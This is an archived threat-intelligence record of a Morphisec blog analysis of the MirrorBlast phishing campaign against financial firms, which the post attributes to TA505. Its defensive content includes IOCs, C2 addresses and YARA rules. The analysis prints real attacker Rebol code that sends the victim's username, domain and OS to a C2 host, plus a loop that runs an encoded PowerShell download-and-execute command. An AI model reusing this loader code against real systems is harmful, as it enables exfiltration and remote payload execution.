{ "id": "55c3edce-00f1-4901-b44f-85161bebf09b", "created_at": "2026-04-06T00:09:25.253852Z", "updated_at": "2026-04-10T03:36:36.759574Z", "deleted_at": null, "sha1_hash": "db18e461db9845d1b954bc2d5c67d4d55821fc17", "title": "Explosive New MirrorBlast Campaign Targets Financial Companies", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1727941, "plain_text": "Explosive New MirrorBlast Campaign Targets Financial Companies\r\nBy Morphisec\r\nArchived: 2026-04-05 12:43:26 UTC\r\nOverview\r\nMorphisec Labs tracked a new MirrorBlast campaign targeting financial services organizations\r\nMirrorBlast is delivered via a phishing email that contains malicious links which download a weaponized Excel\r\ndocument\r\nMirrorBlast has low detections on VirusTotal due to the extremely lightweight macro embedded in its Excel files,\r\nmaking it particularly dangerous for organizations that depend on detection-based security and sandboxing\r\nIntroduction\r\nFinancial organizations are historically among the most targeted by threat actors. There are many reasons for this, not least\r\nof which is the trove of customer data the financial sector holds, as well as the funds to pay large sums of money to regain\r\naccess to encrypted data.\r\nThe Morphisec Labs team has tracked a new version of a campaign targeting financial organizations. Dubbed “MirrorBlast”\r\nby ET Labs, the current attack campaign the Labs team has tracked began in early September. There was similar activity in\r\nApril 2021 as well, but the current campaign began more recently.\r\nThe attack chain of the infection bears a similarity to the tactics, techniques, and procedures commonly used by the\r\nallegedly Russia-based threat group TA505. The similarities extend to the attack chain, the GetandGo functionality, the final\r\npayload, and similarities in the domain name pattern.\r\nTA505 has been active since at least 2014 and, as far as analysts can ascertain, has a financial motivation for their actions.\r\nAs a group, TA505 is most known for frequently changing the malware they use as well as driving global trends in malware\r\ndistribution.\r\nIn this blog post, we will examine the new MirrorBlast phishing campaign, from the initial delivery of a malicious Excel file\r\nto the end result of loading an additional payload.\r\nFigure 1: The attack chain of MirrorBlast\r\nTechnical Details\r\nIn September we observed a malspam campaign delivering Excel documents as an attachment. This campaign targets\r\nmultiple sectors from Canada, the United States, Hong Kong, Europe, and more.\r\nThe attack chain starts with an email attachment document, but at a later stage, it changes to use the Google feedproxy URL\r\nwith SharePoint and OneDrive lure, which poses as a file share request. These URLs lead to a compromised SharePoint or a\r\nfake OneDrive site that the attackers use to evade detection, in addition to a sign-in requirement (SharePoint) that helps to\r\nevade sandboxes.\r\nhttps://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies\r\nPage 1 of 9\n\nFigure 2: A phishing email with the SharePoint lure theme.\r\nFigure 3: A fake OneDrive website serving an Excel document (in German).\r\nExcel Document\r\nThe Excel document is weaponized with an extremely lightweight macro code.\r\nFigure 4: A totally FUD Excel document.\r\nThe macro code can be executed only on a 32-bit version of Office due to compatibility reasons with ActiveX objects\r\n(ActiveX control compatibility). The macro code performs anti sandboxing by checking if the following queries are true:\r\nComputer name is equal to the user domain.\r\nUsername is equal to admin or administrator.\r\nWe have observed different variants of the document, in the first variants there wasn’t any anti-sandboxing and the macro\r\ncode was hidden behind the Language and Code document information properties, later it moved to the sheet cells.\r\nAdditionally, the code has been added one more obfuscation layer on top of the previous obfuscation\r\nhttps://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies\r\nPage 2 of 9\n\nFigure 5: An Excel document with lightweight macro and anti-sandboxing.\r\nThe command executes JScript through the AddCode method from the ScriptControl ActiveX object (ScriptControl\r\nMethods). This method loads and evaluates the code similarly to how Run or Evaluate executes the statement (the official\r\ndocumentation might be misleading).\r\nThe macro executes the following JScript:\r\nFigure 6: An obfuscated JScript command.\r\nThe evaluated deobfuscated command is:\r\nFigure 7: The evaluated JScript.\r\nThis spawns the msiexec.exe process, which is responsible for downloading and installing MSI package. It is also a known\r\nway to break an attack chain sequence and complicate attack trajectory visibility (msiexec LOLBin). The msiexec.exe\r\nprocess executes not as a direct child process of Excel.exe, this, with the addition of setting UILevel to – 2 (Completely\r\nsilent installation) helps with sandbox evasion.\r\nMSI Package\r\nWe have observed two variants of the MSI installer: KiXtart and REBOL. Both variants are generated using the Windows\r\nInstaller XML Toolset (WiX) version – 3.11.0.1528; once executed they drop two files into a random directory in\r\nProgramData. One of them is the legitimate software language interpreter executable (KiXtart or REBOL) and the other is\r\nthe malicious script.\r\nFigure 8: Rebol/KiXtart dropped in the ProgramData folder.\r\nSome of the MSI packages included autorun persistence through `SoftwareMicrosoftWindowsCurrentVersionRun`.\r\nhttps://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies\r\nPage 3 of 9\n\nFigure 9: MSI package registry properties.\r\nREBOL Variant\r\nRebol is a cross-platform data exchange language and a multi-paradigm dynamic programming language\r\n(http://www.rebol.com/). The first stage Rebol script is base64 encoded.\r\nrebol[] do to-string debase\r\n“YXR0ZW1wdFsKCWNhbGwge2VjaG8gJVVTRVJET01BSU4lXCVVU0VSTkFNRSUgPiBuYW1lICYmIGZvciAvZiAidG9rZW5zPTQtNSBkZWxpb\r\ndeducted”\r\nCode Block 1: The first-stage Rebol script.\r\nNext, it exfiltrates targeted information by sending a base64 encoded GET request that represents the user domain,\r\nusername, OS version, architecture, along with a Rebol script build number (build=1.0.0). Older script versions don’t\r\ncontain the build number. The C2 sends back a UUID that will be associated with the victim machine and will be used in\r\nfuture communications.\r\ncall \"echo %USERDOMAIN%%USERNAME% \u003e name \u0026\u0026 VER \u003e os \u0026\u0026 echo %PROCESSOR_ARCHITECTURE% \u003e arch\"\r\nwait 5\r\nreg: enbase join \"name=\" [trim/all read %name \"\u0026os=\" trim/all read %os \"\u0026arch=\" trim/all read %arch\r\n\"\u0026build=1.0.0\"] either exists? %uuid [uuid: read %uuid] [\r\nuuid: read join http://menorukis.su/p/r?x= reg\r\nuuid: parse uuid \"|\"\r\nuuid: uuid/2\r\nwrite %uuid uuid\r\n]\r\nCode Block 2: The Rebol script sends the victim’s data to the C2.\r\nThen, the script will enter an infinite waiting loop where it sends the encoded UUID to the C2 while waiting for the response\r\n“3.”. Once it receives the appropriate response, it will execute a Powershell command that downloads an archive file and\r\nextracts its content to a folder named archive. In that folder is the next stage of the Rebol script that will be executed.\r\nwhile[true][\r\np: enbase join \"uuid=\" uuid\r\nread join http://menorukis[.]su/p/m?x= p\r\na: read join http://menorukis[.]su/p/p?x= p\r\nl: read join http://menorukis[.]su/p/d?x= p\r\nif a == \"3\" [\r\ncall \"powershell.exe -exec bypass -enc\r\nJAB1AHUAaQBkACAAPQAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwATABvAGMAYQBsAFwARwBvAG8AZwBsAGUAXAB1AHUAa\r\nwait 5\r\ndo load %archivepayload.rb\r\nread join http://menorukis[.]su/p/p?x= enbase join \"uuid=\" [uuid \"\u0026status=true\"] ] wait 3]\r\nCode Block 3: The loop waiting for the payload from the C2.\r\nFigure 10: The executed Powershell commands.\r\nWe have also observed a newer version of Rebol script (build=1.0.2) that omits the Powershell execution part. Instead, it\r\nimplements the same logic with Rebol language code; this is done to decrease noise and script size (no PowerShell process\r\nexecution as part of the attack chain). At the time of writing, we couldn’t retrieve the next stage Rebol script (payload.rb).\r\nKiXtart Variant\r\nKiXtart is a free-format scripting language and has rich built-in functionality for easy scripting (http://www.kixtart.org/).\r\nThe dropped script is encrypted or, as the documentation suggests, tokenized script. The KiXtart documentation describes it\r\nas\r\nhttps://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies\r\nPage 4 of 9\n\n“In practical terms this means that tokenized scripts are perfectly safe from attempts at viewing or changing them\r\nby regular end users. However, tokenized scripts are not safe from attacks by people with enough time and\r\ndetermination on their side.” (Kixtart Pre-tokenizing scripts).\r\nQuickly searching for `Decrypt` in the strings leads to the corresponding subroutine where the decryption happens.\r\nFigure 11: KiXtart executable – decryption function.\r\nDumping the strings from memory after they were decrypted resulted in the following:\r\nFigure 12: Strings from the dumped memory.\r\nLooking at the strings along with the .pcap file we captured, we see that the script sends the victim’s machine information\r\n(domain, computer name, user name, process list) to the C2. The C2 responds with a number that will indicate how to\r\nproceed, as with the Rebol variant.\r\nAttribution to TA505\r\nBelow are the TTPs that allows us to safely attribute the attack chain to TA505:\r\nInfection chain consists of Email -\u003e XLS -\u003e MSI (Rebol/KiXtart loader). The MSI component has a high\r\nresemblance to the Get2 (GetandGo) loader from TA505\r\nUsing SharePoint/OneDrive lure theme.\r\nUsing cdn*dl*fileshare, *onedrive* or *dropbox* as part of the domain name.\r\nOne of the SharePoint lure themed emails lead to the following page:\r\nFigure 13: Page with mismatched MD5 in the details pane.\r\nhttps://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies\r\nPage 5 of 9\n\nWe have noticed that the MD5 in the details pane doesn’t match the MD5 of the Excel document. In fact, this MD5\r\nbelongs to a legitimate Putty SFTP client. This specific hash was mentioned in a related TA505 intrusion.\r\nAccording to @ffforward, the next-stage Rebol script leads to the FlawedGrace RAT that is associated with TA505\r\n(malpedia-flawedgrace).\r\nConclusion\r\nTA505 is one of many financially motivated threat groups currently active in the marketplace. They are also one of the most\r\ncreative, as they have a tendency to constantly shift the attacks they leverage to achieve their goals. This new cyberattack for\r\nMirrorBlast is no exception for TA505 or for other innovative threat groups.\r\nIf anything, the shift in the attack chain is a further indication that organizations can ill afford to take a defensive, reactive\r\napproach to their security. They must remain constantly vigilant, iterating on security procedures to ensure they are not\r\ncaught off-guard when new TTPs are deployed to breach their defenses.\r\nThe ability of the MirrorBlast attack to have very low detections in VirusTotal is also indicative of the focus most groups\r\nhave on evading detection-centric solutions. Yet again, it is clear that the market’s reliance on detection and response leaves\r\nthem open to more attacks than it resolves. A new way forward is needed.\r\nMorphisec Labs continues to track this campaign, and will provide updates as necessary.\r\nIOCs\r\nXLS\r\n55a06694bb96ecc422a7a6c731053b1ef5a35b5f5bac78752ca60b729cf7441f\r\n9f79b9b0811b43a8bfff663083e3a380981db8cd8a4de7f5c8e073ebd6b412f7\r\nde7fbe79942b20286d1676981f301472e02cabacc539ae944a7ef9f0977cb869\r\n86ea7a3f1a8418c27a6ccab58b933c6ecc595dd271db81819defb0f49d452c6d\r\n1eeb11946bb96ec1b749e246e4e56d2952264cffc370fc660c554de7cbd18ad4\r\nb593add117782fee1816d31afd95355533f926653b140291445543d9e3aca246\r\n867ae77ee54f412f8e56f2d3af5599d46d681d20171ae46c8166c5fec572a873\r\n2c2dda4f1a8810d8a774f0fb5e0e33b6ed4a3172601f457f37b5e4eacc6c4c27\r\n62cc2dd469713bf00f702c6c3b2e0bff92c21cbeadedcd09e9dde735c83d2712\r\n0a27471acc8ef0f3d6ee98b56b1030e5a83896e08a69a4574693d6c811307beb\r\n0cddfcb860d368413412df6905dd7962241675d7b1984f913d44a707cc04f689\r\n1c3b8a671c18cf25c71b21ad47f827c3037291f122bbcb148fae416973b636f1\r\n49ba406f19c2b1b689827a63517fa76b8e4f1346c4ff93c6a74c5ee8cba45367\r\n862e11e9d7f9c9ab27a4a30fa06fcefd292600d0d0a490aabd374db12bd8ded3\r\n442201667c85427b0a03437ff651b5eea280a21836de4a9e23bbd85c69c8208f\r\n28221d5ed7a6b37a4a0e5be77a9137378b1b6ca850c6327b77eae7a2b4437c96\r\nd508ebf55bb751e5c06c87f33c4ba75ed8efe05595011f47c51429e2ce041880\r\nf2c90ffe3562335fab9532003e43d4911b8e42f34e3d693ba82703311dc133d2\r\n4648edc370e61a52c95d3f525391e0154406fd661d01d091f2d9dba9f8a485f2\r\n7073c55a5532d90c738993c14b6f983d1fb75030799e40249086f739c07c4ddc\r\nc6c6311c315503b53f8b5beb79eb568b243e7b07e66917635e4a2ebfdef0b0fa\r\n58a2ed404491f9cf523598cad8e8c2b87dba0f58e6b7894c8a5c2a46482fdf55\r\na66ae3be95b3e28757d0ec25b68f968459490a38d62bc3c935778b534f177c08\r\nb4de229237c0e0b540f97a6c43afe759e2bc4d2685c29fae1a63769ab58c3e0a\r\ne834acc3615f1b6ed00396d3db1e86770486f48433948a2a323b4f7bd99d9d19\r\nfbf46626fcb130611b5e9d96c6c9a5f523c322cd0affa83a91c4d37b3efb2c93\r\nd3a65f05ca4f72acf2cf07f56e37529e17cce6123463fb830c81106fa0c537c3\r\n8d16d408b915d28bf68b22ec96d2f900a45524d6843f68c52acc2e31aecd12ed\r\n3d24db72c1fb0913c9b74c1d69ad79aa95c287d970963c32ae10d93e6eb5386e\r\nd18c8bb2c9c59297c28f29db347238db4efd33d04f7a2af63ef26b8e8b9d0d79\r\nf4891094d6623dadbf84486b85a29b4bd0badf28ee100bc0e44c550715614e62\r\nc1ff2b5a636658e8f15b9dc9aef5d345477548b19f3f7fe232da8d8817138f00\r\nhttps://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies\r\nPage 6 of 9\n\nd6c487b1fb3d31851921b343f3d131f7cb4c0469a60484037a6fa8cfbdc29dea\r\nd236965a9ea87cfd7feaf67d1cbba45b8c24860c647ea51f34390cd89a5bde52\r\n79ba3338e507701af421d546b810012b8acded9bbb1552fadd86e34a4b2e00b1\r\n32b186a85062af8676bfe13a67577e6103acb0b00932c022fb5bb3c65a5840d3\r\n5ade4bd97c596505ef0219639aaa8141a3ff34ba212cdf510e0a121a0296f758\r\n948cf7061381fed4847b37f8bc8983d7a909e354e10096c040781ef0e0e89bb4\r\n7fc2fed914bdc1d7f49bd36d6196fffe818156bd05f48c73ad68021f7723cd4b\r\n1fd41236332fa7ce30f1fded2ffab486ae713519af7ca0ef23a7077c6e09d973\r\nf66f9f0e293e622b046ab473cf99d071a377418fd69bf1685c8d23c371f517cc\r\nc256a67fcfcd31269a91a49bf89919bf909b3056a0e8260b6e5dd89564412e187904e73defa12c220cdc04d059cfc8acf3ae96dad41c7bb26381f076f17004cf\r\n9eaa499aa4a1bc644d2a9696f87a2e75c50c64da1ad52837db4e15659b7fd17f\r\n5457145d1709f6828a743ebe4ab34c74345647d7caca86d715db1cb52a7c596e\r\n8b6a7dee378118541acdd60aa5bef687ce1470f62403c6429045dc17b494349b\r\ncc5645a8109d03c1b02033b878144ae5ea39896ceaa3051136c1c740559b86fc\r\nfd4cd957f43c27084662d08031a049603f205dfc321d7fb858e9332c6c90a1ec\r\nMSI packages\r\n9d102de45f1e8adebe2e9dd46712c4058be383499a6c340d65cc7d91a7c27c74\r\n3a5cbaccae5178b29fdd57b0bff51574be1714d3f1ff0e528f5753af5ba9893a\r\n8c2b6cc4d672ade525421168d296ff5e2f367daf0e92311fdb8af6dc09006297\r\nb15f7056d2618cead5ca4e0eb6e414501bc295d95f34b84c6cf943e5c55c319d\r\na403eae5b12b909f4075e855f58d1742308d5e0d3450e79b60162fa9fb7caad7\r\na69d27abd043cc676095f71300bf6b2368167536fcd4fe5342cf79a7e94fc2fe\r\nc0114535dad04e955db6b9e51588eb6942b9b092b0250f97bcd58c53ed48d384\r\n808bbadea24f83013464dbf445a6c4b3050a7a5da03c16e04c8bd9e57198b1a5\r\ned7709cbbad9e164a45235be5270d6fb3492010ea945728a7d58f65f63434e58\r\n2b108ec3e467ab6c3a9ad6a5545e8410e4185f8fee7a008d3d3a89a8caf86e75\r\n0e6451e1f0eadb89390f4360e2a49a2ffb66e92e8b3ae75400095e75f4dd6abb\r\ne87595fde2ead6bf842d86b3170c09d4c7b462ca23afcd3484b9bafb46c35338\r\nd31cbaf03ae0d94f64de0d3108d3f957d81a7245b84e35aaef9c3c166be20bf6\r\nef55cb6228a33131152f7bf90bb23597b7ed7ba6a81f90fa283673e5f6a374f8\r\n6841b26b9218688de6318b083cb70ecdca65876455a1723be00b383844c71f42\r\n1bbbdcff7723fda499b8b7bffcdb510d56d10224bdb3293ae3d24debb9962aaa\r\n83e4c90dc8bc1c53a4000bef83a355c4e36d2a1ba4a5d0982bc5b9b350278f1f\r\n1d591def05a84554b94d042458f9d57ffb6ef7cebc3b6a8e164ec801f5e55642\r\na2fe17e940e8dbc5ed9e5c7c43d53ed75e0c37fca340bef648581c332309e8c1\r\n61f1b9c62af8cabeb930ac0046adf6844be88896bfb3a5bd659a0d061c559791\r\neceb164a69e8f79bb08099fcdf2b75071c527b0107daebc0e7a88e246b4c7f13\r\nC2\r\n172.105.178[.]119\r\n139.59.93[.]223\r\n207.246.101[.]153\r\nmenorukis[.]su\r\n155.138.205[.]35\r\n45.79.239[.]23\r\n95.216.138[.]82\r\n194.180.174[.]6\r\n185.202.93[.]201\r\n185.10.68[.]235\r\n185.183.96[.]147\r\n185.225.19[.]246\r\n185.176.220[.]198\r\n5.189.222[.]161\r\n46.161.40[.]172feristoaul[.]com\r\n23.19.58[.]52\r\nfidufagios[.]com\r\nYara Rules\r\nrule MirrorBlast{\r\nhttps://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies\r\nPage 7 of 9\n\nmeta:\r\ndescription = “Detects MirrorBlast Excel documents”\r\nauthor = “Morphisec labs”\r\nstrings:\r\n$header = { D0 CF 11 E0 A1 B1 1A E1 } // Excel header\r\n$jscript_str_1 = “).reverse().join(”))”\r\n$jscript_str_2 = “eval(‘”\r\n$jscript_str_3 = “.split(‘”\r\ncondition:\r\n$header at 0 and all of ($jscript_str_*)\r\n}\r\nrule MirrorBlast_msi\r\n{\r\nmeta:\r\ndescription = “Detects MirrorBlast MSI package”\r\nauthor = “Morphisec labs”\r\nstrings:\r\n$wix_installer = “Windows Installer XML Toolset (3.11.0.1528)”\r\n$kixtart_variant = “WKIX32”\r\n$rebol_variant = “Google”\r\ncondition:\r\n$wix_installer and 1 of ($kixtart_variant, $rebol_variant)\r\n}\r\nFile names\r\nC:ProgramDataLocalGooglerebol-view-278-3-1.exe\r\nC:ProgramDataLocalGoogleexemple.rb\r\nC:ProgramDatatempAudioDriver.exe\r\nC:ProgramDatatempimage.ico\r\nC:ProgramDataExcelsvchost.exe\r\nC:ProgramDataExcelsvchost.bin\r\nC:ProgramData01arab.exe\r\nC:ProgramData01arab.bin\r\nAbout the author\r\nhttps://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies\r\nPage 8 of 9\n\nMorphisec\r\nSource: https://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies\r\nhttps://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies" ], "report_names": [ "explosive-new-mirrorblast-campaign-targets-financial-companies" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "5e6b31a6-80e3-4e7d-8b0a-d94897ce9b59", "created_at": "2024-06-19T02:03:08.128175Z", "updated_at": "2026-04-10T02:00:03.636663Z", "deleted_at": null, "main_name": "GOLD TAHOE", "aliases": [ "Cl0P Group Identity", "FIN11 ", "GRACEFUL SPIDER ", "SectorJ04 ", "Spandex Tempest ", "TA505 " ], "source_name": "Secureworks:GOLD TAHOE", "tools": [ "Clop", "Cobalt Strike", "FlawedAmmy", "Get2", "GraceWire", "Malichus", "SDBbot", "ServHelper", "TrueBot" ], "source_id": "Secureworks", "reports": null }, { "id": "75d4d6a9-b5d1-4087-a7a0-e4a9587c45f4", "created_at": "2022-10-25T15:50:23.5188Z", "updated_at": "2026-04-10T02:00:05.26565Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "TA505", "Hive0065", "Spandex Tempest", "CHIMBORAZO" ], "source_name": "MITRE:TA505", "tools": [ "AdFind", "Azorult", "FlawedAmmyy", "Mimikatz", "Dridex", "TrickBot", "Get2", "FlawedGrace", "Cobalt Strike", "ServHelper", "Amadey", "SDBbot", "PowerSploit" ], "source_id": "MITRE", "reports": null }, { "id": "99cb4e5b-8071-4f9e-aa1d-45bfbb6197e3", "created_at": "2023-01-06T13:46:38.860754Z", "updated_at": "2026-04-10T02:00:03.125179Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "SectorJ04", "SectorJ04 Group", "ATK103", "GRACEFUL SPIDER", "GOLD TAHOE", "Dudear", "G0092", "Hive0065", "CHIMBORAZO", "Spandex Tempest" ], "source_name": "MISPGALAXY:TA505", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e447d393-c259-46e2-9932-19be2ba67149", "created_at": "2022-10-25T16:07:24.28282Z", "updated_at": "2026-04-10T02:00:04.921616Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "ATK 103", "Chimborazo", "G0092", "Gold Evergreen", "Gold Tahoe", "Graceful Spider", "Hive0065", "Operation Tovar", "Operation Trident Breach", "SectorJ04", "Spandex Tempest", "TA505", "TEMP.Warlock" ], "source_name": "ETDA:TA505", "tools": [ "Amadey", "AmmyyRAT", "AndroMut", "Azer", "Bart", "Bugat v5", "CryptFile2", "CryptoLocker", "CryptoMix", "CryptoShield", "Dridex", "Dudear", "EmailStealer", "FRIENDSPEAK", "Fake Globe", "Fareit", "FlawedAmmyy", "FlawedGrace", "FlowerPippi", "GOZ", "GameOver Zeus", "GazGolder", "Gelup", "Get2", "GetandGo", "GlobeImposter", "Gorhax", "GraceWire", "Gussdoor", "Jaff", "Kasidet", "Kegotip", "Kneber", "LOLBAS", "LOLBins", "Living off the Land", "Locky", "MINEBRIDGE", "MINEBRIDGE RAT", "MirrorBlast", "Neutrino Bot", "Neutrino Exploit Kit", "P2P Zeus", "Peer-to-Peer Zeus", "Philadelphia", "Philadephia Ransom", "Pony Loader", "Rakhni", "ReflectiveGnome", "Remote Manipulator System", "RockLoader", "RuRAT", "SDBbot", "ServHelper", "Shifu", "Siplog", "TeslaGun", "TiniMet", "TinyMet", "Trojan.Zbot", "Wsnpoem", "Zbot", "Zeta", "ZeuS", "Zeus" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434165, "ts_updated_at": 1775792196, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/db18e461db9845d1b954bc2d5c67d4d55821fc17.pdf", "text": "https://archive.orkl.eu/db18e461db9845d1b954bc2d5c67d4d55821fc17.txt", "img": "https://archive.orkl.eu/db18e461db9845d1b954bc2d5c67d4d55821fc17.jpg" } }